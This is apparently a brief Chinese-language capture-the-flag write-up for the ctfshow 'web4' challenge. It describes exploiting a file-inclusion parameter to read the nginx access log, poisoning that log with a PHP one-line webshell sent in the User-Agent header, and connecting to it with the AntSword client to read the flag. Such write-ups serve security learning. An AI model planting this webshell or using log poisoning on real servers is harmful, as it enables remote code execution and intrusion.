web4
题目
分析
和上一题显示的页面一样,用同样的方法尝试注入:
出现报错:
看来这题相比上一题增加了过滤。
使用 shell_exec
同理:
换个思路,尝试使用一句话木马连接服务器后台。
根据发回的响应包可以确定这题使用的是 nginx 服务器:
看看访问日志先,?url=/var/log/nginx/access.log
:
尝试使用日志包含写入一句话木马,往 User-Agent 字段传入一句话木马 <?php @eval($_POST['web4']);?>
传入后的日志增加一条记录:
使用中国蚁剑连接日志文件,在 /var/www/flag.txt 目录找到 flag 内容。
参考
ctfshow_WriteUp | _萌新-Guanz-博客园